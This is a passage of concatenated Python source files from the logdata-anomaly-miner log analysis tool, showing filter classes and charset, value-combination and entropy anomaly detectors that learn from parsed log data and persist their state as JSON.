1 return True original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) analysis_component = {"AffectedLogAtomPaths": list(log_atom.parser_match.get_match_dictionary()), "AffectedLogAtomValues": [data]} sorted_log_lines = [original_log_line_prefix + data] event_data["AnalysisComponent"] = analysis_component for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "No allowlisting for current atom", sorted_log_lines, event_data, log_atom, self) return False def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ super().log_statistics(component_name) for i, rule in enumerate(self.allowlist_rules): rule.log_statistics(component_name + "." + rule.__class__.__name__ + str(i)) logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/AtomFilters.py000066400000000000000000000130351500476301700336330ustar00rootroot00000000000000"""This file collects various classes useful to filter log atoms and pass them to different handlers. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface class SubhandlerFilter(AtomHandlerInterface): """Handlers of this class pass the received atoms to a list of atom handlers.""" def __init__(self, subhandler_list, stop_when_handled_flag=False): """ @param subhandler_list a list of objects implementing the AtomHandlerInterface which are run until the end, if stop_when_handled_flag is False or until an atom handler can handle the log atom. @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom. """ super().__init__( mutable_default_args=["subhandler_list"], subhandler_list=subhandler_list, stop_when_handled_flag=stop_when_handled_flag) def add_handler(self, atom_handler, stop_when_handled_flag=False): """Add a handler to the list of handlers. @param atom_handler an object implementing the AtomHandlerInterface. @param stop_when_handled_flag True, if the atom handler processing should stop after successfully receiving the log atom. """ self.subhandler_list.append((atom_handler, stop_when_handled_flag)) def receive_atom(self, log_atom): """Receive a parsed atom and the information about the parser match. @return False when no subhandler was able to handle the atom. """ result = False self.log_total += 1 for handler, stop_when_handled_flag in self.subhandler_list: handler_result = handler.receive_atom(log_atom) if handler_result is True: result = True self.log_success += 1 if stop_when_handled_flag: break return result class MatchPathFilter(AtomHandlerInterface): """This class just splits incoming matches according to existence of paths in the match.""" def __init__(self, parsed_atom_handler_lookup_list, default_parsed_atom_handler=None): """ Initialize the filter. @param parsed_atom_handler_lookup_list contains tuples with search path string and handler. When the handler is None, the filter will just drop a received atom without forwarding. @param default_parsed_atom_handler invoke this handler when no handler was found for given match path or do not invoke any handler when None. """ super().__init__( parsed_atom_handler_lookup_list=parsed_atom_handler_lookup_list, default_parsed_atom_handler=default_parsed_atom_handler) def receive_atom(self, log_atom): """Receive a parsed atom and the information about the parser match. @return False when log_atom did not contain match data or was not forwarded to any handler, True otherwise. """ self.log_total += 1 if log_atom.parser_match is None: return False match_dict = log_atom.parser_match.get_match_dictionary() for path_name, target_handler in self.parsed_atom_handler_lookup_list: if path_name in match_dict: if target_handler is not None: target_handler.receive_atom(log_atom) self.log_success += 1 return True if self.default_parsed_atom_handler is None: return False self.default_parsed_atom_handler.receive_atom(log_atom) self.log_success += 1 return True class MatchValueFilter(AtomHandlerInterface): """This class just splits incoming matches using a given match value and forward them to different handlers.""" def __init__(self, target_path, parsed_atom_handler_dict, default_parsed_atom_handler=None): """Initialize the splitter. @param target_path the path to be analyzed in the parser match of the log atom. @param parsed_atom_handler_dict a dictionary of match value to atom handler. @param default_parsed_atom_handler invoke this default handler when no value handler was found or do not invoke any handler when None. """ super().__init__(target_path=target_path, parsed_atom_handler_dict=parsed_atom_handler_dict, default_parsed_atom_handler=default_parsed_atom_handler) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 if log_atom.parser_match is None: return False target_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if target_value is not None: target_value = target_value.match_object target_handler = self.parsed_atom_handler_dict.get(target_value, self.default_parsed_atom_handler) if target_handler is None: return False target_handler.receive_atom(log_atom) self.log_success += 1 return True CharsetDetector.py000066400000000000000000000325571500476301700344200ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for value character sets. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class CharsetDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when numeric values are outside learned intervals.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, id_path_list, target_path_list, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param id_path_list specifies group identifiers for which data should be learned/analyzed. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param persistence_id name of persistence file. @param learn_mode specifies whether value ranges should be extended when values outside of ranges are observed. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, learn_mode=learn_mode, id_path_list=id_path_list, persistence_id=persistence_id, stop_learning_time=stop_learning_time, output_logline=output_logline, ignore_list=ignore_list, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, target_path_list=target_path_list, constraint_list=constraint_list, log_resource_ignore_list=log_resource_ignore_list ) # Persisted data stores characters as bytes for each id, i.e., [[[], []], ...]] self.charsets = {} self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) self.load_persistence_data() def receive_atom(self, log_atom): """Receive a log atom from a source.""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time parser_match = log_atom.parser_match if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Skip atom when ignore paths in atom or constraint paths not in atom. all_paths_set = set(parser_match.get_match_dictionary().keys()) if len(all_paths_set.intersection(self.ignore_list)) > 0 or \ len(all_paths_set.intersection(self.constraint_list)) != len(self.constraint_list): return False # Store all values from target paths in a list. values = [] all_values_none = True for path in self.target_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: value = match.match_object if not isinstance(match.match_object, bytes): value = str(match.match_object).encode(AminerConfig.ENCODING) if value is not None: all_values_none = False values.append(value) if all_values_none is True: return False # Store all values from id paths in a list. Use empty list as default path if not applicable. id_vals = [] for path in self.id_path_list: match = parser_match.get_match_dictionary().get(path) if match is None: continue matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match in matches: if isinstance(match.match_object, bytes): value = match.match_object.decode(AminerConfig.ENCODING) else: value = str(match.match_object) id_vals.append(value) id_event = tuple(id_vals) # Check if one of the values has new characters for a specific id path. if id_event in self.charsets: missing_chars = set() for c in b"".join(values): if c not in self.charsets[id_event]: missing_chars.add(c) if len(missing_chars) > 0: try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get( CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [log_atom.parser_match.match_element.annotate_match("") + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [data] missing_chars_decoded = [] for character in missing_chars: missing_chars_decoded.append(character.to_bytes(1, "big").decode(AminerConfig.ENCODING)) affected_values = [] for value in values: affected_values.append(value.decode(AminerConfig.ENCODING)) analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": affected_values, "MissingCharacters": missing_chars_decoded} event_data = {"AnalysisComponent": analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New character(s) detected", sorted_log_lines, event_data, log_atom, self) # Extend charsets if learn mode is active. if self.learn_mode: self.charsets[id_event].update(missing_chars) if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) else: self.charsets[id_event] = set(b"".join(values)) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" lst = [] for id_ev, charset in self.charsets.items(): lst.append([id_ev, list(charset)]) PersistenceUtil.store_json(self.persistence_file_name, lst) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for lst in persistence_data: self.charsets[tuple(lst[0])] = set(lst[1]) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.constraint_list: self.constraint_list.append(event_data) return f"Allowlisted path {event_data} in {event_type}." def blocklist_event(self, event_type, event_data, blocklisting_data): """Blocklist an event generated by this source using the information emitted when generating the event. @return a message with information about blocklisting @throws Exception when blocklisting of this special event using given blocklisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if blocklisting_data is not None: msg = "Blocklisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if event_data not in self.ignore_list: self.ignore_list.append(event_data) return f"Blocklisted path {event_data} in {event_type}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info("'%s' processed %d out of %d log atoms successfully in the last 60 minutes.", component_name, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 EnhancedNewMatchPathValueComboDetector.py000066400000000000000000000323111500476301700407410ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This file defines the EnhancedNewMatchPathValueComboDetector. detector to extract values from LogAtoms and check, if the value combination was already seen before. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import types from aminer.analysis.NewMatchPathValueComboDetector import NewMatchPathValueComboDetector from aminer.util import PersistenceUtil from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, STAT_LOG_NAME, \ CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX from aminer import AminerConfig class EnhancedNewMatchPathValueComboDetector(NewMatchPathValueComboDetector): """This class creates events when a new value combination for a given list of match data paths were found. It is similar to the NewMatchPathValueComboDetector basic detector but also provides support for storing meta information about each. detected value combination, e.g. * the first time a tuple was detected using the LogAtom default timestamp. * the last time a tuple was seen * the number of times the tuple was seen * user data for annotation. Due to the additional features, this detector is slower than the basic detector. """ def __init__(self, aminer_config, target_path_list, anomaly_event_handlers, persistence_id="Default", allow_missing_values_flag=False, learn_mode=False, tuple_transformation_function=None, output_logline=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param target_path_list the list of values to extract from each match to create the value combination to be checked. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object. @param learn_mode when set to True, this detector will report a new value only the first time before including it in the known values set automatically. @param tuple_transformation_function when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None self.known_values_dict = {} if tuple_transformation_function is not None and not isinstance(tuple_transformation_function, types.FunctionType): msg = "tuple_transformation_function must be a function." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) self.tuple_transformation_function = tuple_transformation_function super().__init__( aminer_config=aminer_config, target_path_list=target_path_list, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, allow_missing_values_flag=allow_missing_values_flag, learn_mode=learn_mode, output_logline=output_logline, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list) if not self.target_path_list: msg = "target_path_list must not be None or empty." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise ValueError(msg) self.date_string = "%Y-%m-%d %H:%M:%S" self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: # Dictionary and tuples were stored as list of lists. Transform # the first lists to tuples to allow hash operation needed by set. for value_tuple, extra_data in persistence_data: self.known_values_dict[tuple(value_tuple)] = extra_data logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """Receive on parsed atom and the information about the parser match. @return True if a value combination was extracted and checked against the list of known combinations, no matter if the checked values were new or not. """ for source in self.log_resource_ignore_list: if log_atom.source.resource_name.decode() == source: return False self.log_total += 1 if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time match_dict = log_atom.parser_match.get_match_dictionary() if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False timestamp = log_atom.get_timestamp() timestamp = round(timestamp, 3) match_value_list = [] for target_path in self.target_path_list: match = match_dict.get(target_path) if match is None: if not self.allow_missing_values_flag: return False match_value_list.append(None) else: matches = [] if isinstance(match, list): matches = match else: matches.append(match) for match_element in matches: match_value_list.append(match_element.match_object) if self.tuple_transformation_function is not None: match_value_list = self.tuple_transformation_function(match_value_list) match_value_tuple = tuple(match_value_list) if self.known_values_dict.get(match_value_tuple) is None: self.known_values_dict[match_value_tuple] = [timestamp, timestamp, 1] self.log_new_learned_values.append(match_value_tuple) else: extra_data = self.known_values_dict.get(match_value_tuple) extra_data[1] = timestamp extra_data[2] += 1 affected_log_atom_values = [] metadata = {} for match_value in list(match_value_tuple): if isinstance(match_value, bytes): match_value = match_value.decode(AminerConfig.ENCODING) affected_log_atom_values.append(str(match_value)) values = self.known_values_dict.get(match_value_tuple) metadata["TimeFirstOccurrence"] = values[0] metadata["TimeLastOccurrence"] = values[1] metadata["NumberOfOccurrences"] = values[2] analysis_component = {"AffectedLogAtomPaths": self.target_path_list, "AffectedLogAtomValues": affected_log_atom_values, "Metadata": metadata} event_data = {"AnalysisComponent": analysis_component} if (self.learn_mode and self.known_values_dict.get(match_value_tuple)[2] == 1) or not self.learn_mode: self.log_learned_path_value_combos += 1 try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) if self.output_logline: original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) sorted_log_lines = [str(self.known_values_dict) + os.linesep + original_log_line_prefix + data] else: sorted_log_lines = [str(self.known_values_dict)] for listener in self.anomaly_event_handlers: listener.receive_event(f"Analysis.{self.__class__.__name__}", "New value combination(s) detected", sorted_log_lines, event_data, log_atom, self) if self.learn_mode and self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = max(self.stop_learning_time, log_atom.atom_time + self.stop_learning_no_anomaly_time) self.log_success += 1 return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [] for dict_record in self.known_values_dict.items(): persistence_data.append(dict_record) PersistenceUtil.store_json(self.persistence_file_name, persistence_data) logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def allowlist_event(self, event_type, event_data, allowlisting_data): """Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ if event_type != f"Analysis.{self.__class__.__name__}": msg = "Event not from this source" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if allowlisting_data is not None: msg = "Allowlisting data not understood by this detector" logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, tuple) or len(event_data) != 2 or not isinstance(event_data[0], (float, int)) or \ len(event_data[1]) != len(self.target_path_list): msg = "event_data has to be of type tuple and must contain timestamp and tuple of values." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) if not self.allow_missing_values_flag and None in event_data: msg = "event_data must not have None values if allow_missing_values_flag is False." logging.getLogger(DEBUG_LOG_NAME).error(msg) raise TypeError(msg) current_timestamp = event_data[0] self.known_values_dict[event_data[1]] = [current_timestamp, current_timestamp, 1] return f"Allowlisted path(s) {', '.join(self.target_path_list)} with {event_data}." def log_statistics(self, component_name): """Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes.", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %d out of %d log atoms successfully and learned %s new value combinations in the last 60 minutes." " Following new value combinations were learned: %s", component_name, self.log_success, self.log_total, self.log_learned_path_value_combos, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_learned_path_value_combos = 0 self.log_new_learned_values = [] EntropyDetector.py000066400000000000000000001422661500476301700344660ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis"""This module defines an detector for character pair probabilities in values. The idea is based on freq.py (https://github.com/markbaggett/freq) by Mark Baggett. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME, CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX, \ KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.events.EventInterfaces import EventSourceInterface from aminer.input.InputInterfaces import AtomHandlerInterface, PersistableComponentInterface from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class EntropyDetector(AtomHandlerInterface, TimeTriggeredComponentInterface, EventSourceInterface, PersistableComponentInterface): """This class creates events when character pairs with low probabilities occur in values.""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, target_path_list, prob_thresh=0.05, default_freqs=False, skip_repetitions=False, persistence_id="Default", learn_mode=False, output_logline=True, ignore_list=None, constraint_list=None, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same path. @param prob_thresh limit for the average probability of character pairs for which anomalies are reported. @param default_freqs initializes the probabilities with default values from https://github.com/markbaggett/freq. @param skip_repetitions boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run. @param persistence_id name of persistence file. @param learn_mode when set to True, the detector will extend the table of character pair frequencies based on new values. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. @param constraint_list list of paths that have to be present in the log atom to be analyzed. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, target_path_list=target_path_list, prob_thresh=prob_thresh, default_freqs=default_freqs, skip_repetitions=skip_repetitions, persistence_id=persistence_id, learn_mode=learn_mode, output_logline=output_logline, ignore_list=ignore_list, constraint_list=constraint_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) self.value_set = set() self.freq = {} self.total_freq = {} if default_freqs is True: # Default probabilities taken from https://github.com/markbaggett/freq default_f = [True, "\n\t~`!@#$%^&*()_+-", [["\f", [["f", 2]]], [" ", [[" ", 312527], ["$", 12], ["(", 1520], [",", 6], ["0", 2], ["4", 210], ["8", 75], ["<", 58], ["D", 5449], ["H", 14898], ["L", 6849], ["P", 10276], ["T", 23773], ["X", 290], ["`", 1958], ["d", 74474], ["h", 195782], ["l", 64742], ["p", 65902], ["t", 408490], ["x", 22], ["|", 38], ["#", 6], ["'", 3062], ["+", 2], ["/", 12], ["3", 300], ["7", 134], [";", 8], ["?", 8], ["C", 9334], ["G", 5688], ["K", 2484], ["O", 4266], ["S", 13139], ["W", 9355], ["[", 408], ["_", 220], ["c", 90632], ["g", 44086], ["k", 13940], ["o", 161371], ["s", 182472], ["w", 187994], ["{", 8], ["\"", 22346], ["&", 42], ["*", 112], [".", 2358], ["2", 691], ["6", 180], [":", 14], [">", 2], ["B", 12213], ["F", 8428], ["J", 5957], ["N", 7370], ["R", 5046], ["V", 3389], ["Z", 250], ["b", 109654], ["f", 95818], ["j", 6186], ["n", 56010], ["r", 54486], ["v", 15242], ["z", 238], ["~", 2], ["%", 2], [")", 2], ["-", 550], ["1", 1613], ["5", 132], ["9", 74], ["A", 16635], ["E", 4590], ["I", 45393], ["M", 17353], ["Q", 356], ["U", 753], ["Y", 2574], ["a", 293192], ["e", 47200], ["i", 125201], ["m", 99016], ["q", 5914], ["u", 27850], ["y", 29288]]], ["$", [[" ", 2], ["3", 2], ["2", 6], ["4", 10]]], ["(", [[" ", 2], ["\"", 34], ["$", 12], ["'", 24], ["*", 8], ["1", 28], ["3", 24], ["2", 30], ["5", 2], ["A", 54], ["C", 12], ["B", 32], ["E", 12], ["D", 16], ["G", 6], ["F", 40], ["I", 120], ["H", 48], ["K", 10], ["J", 2], ["M", 48], ["L", 14], ["O", 20], ["N", 26], ["P", 26], ["S", 46], ["U", 8], ["T", 124], ["W", 38], ["V", 2], ["Y", 4], ["_", 14], ["a", 306], ["`", 2], ["c", 22], ["b", 50], ["e", 24], ["d", 18], ["g", 10], ["f", 80], ["i", 122], ["h", 102], ["k", 2], ["j", 2], ["m", 20], ["l", 20], ["o", 86], ["n", 38], ["p", 16], ["s", 106], ["r", 6], ["u", 6], ["t", 240], ["w", 212], ["v", 2], ["y", 6], ["~", 8]]], [",", [["!", 2], [" ", 200706], ["\"", 10148], ["'", 1656], [")", 4], ["*", 18], ["-", 780], [",", 10], ["1", 40], ["0", 263], ["3", 6], ["2", 42], ["5", 44], ["4", 28], ["7", 4], ["6", 20], ["9", 12], ["8", 18], [":", 4], ["A", 4], ["I", 42], ["J", 2], ["M", 2], ["T", 2], ["[", 2], ["a", 328], ["c", 8], ["b", 76], ["e", 6], ["d", 4], ["g", 10], ["f", 60], ["i", 36], ["h", 36], ["k", 6], ["m", 10], ["l", 6], ["o", 22], ["n", 8], ["q", 2], ["p", 2], ["s", 64], ["r", 8], ["t", 84], ["w", 70]]], ["0", [[" ", 512], ["%", 16], ["'", 14], [")", 20], ["-", 20], [",", 155], [".", 70], ["1", 38], ["0", 714], ["3", 17], ["2", 32], ["5", 34], ["4", 13], ["7", 30], ["6", 21], ["9", 34], ["8", 20], [";", 8], [":", 22], ["@", 20], ["I", 6], ["]", 46], ["m", 2], ["s", 6], ["t", 74], ["x", 10], ["}", 18]]], ["4", [[" ", 70], ["'", 4], [")", 2], ["-", 12], [",", 70], [".", 46], ["1", 24], ["0", 82], ["3", 24], ["2", 24], ["5", 34], ["4", 16], ["7", 28], ["6", 16], ["9", 24], ["8", 34], [";", 6], [":", 44], ["@", 8], ["T", 2], ["]", 60], ["t", 64], ["}", 18], ["|", 32]]], ["8", [[" ", 64], ["'", 6], ["-", 12], [",", 68], [".", 28], ["1", 192], ["0", 155], ["3", 132], ["2", 89], ["5", 26], ["4", 56], ["7", 26], ["6", 74], ["9", 37], ["8", 12], [";", 12], [":", 14], ["?", 2], ["@", 10], ["]", 54], ["m", 2], ["t", 56], ["}", 18], ["|", 44]]], ["<", [["A", 64], ["C", 132], ["B", 10], ["E", 18], ["D", 14], ["G", 4], ["F", 20], ["I", 14], ["H", 94], ["K", 2], ["M", 14], ["L", 8], ["O", 14], ["N", 2], ["P", 14], ["S", 14], ["R", 10], ["T", 224], ["W", 24], ["Y", 2], ["m", 2], ["s", 2]]], ["@", [[" ", 102], ["c", 8], ["e", 14], [",", 8], [".", 8], ["u", 6], ["v", 16]]], ["D", [["!", 4], [" ", 358], ["'", 72], ["*", 16], ["-", 64], [",", 14], [".", 66], [";", 2], ["?", 2], ["A", 93], ["C", 2], ["E", 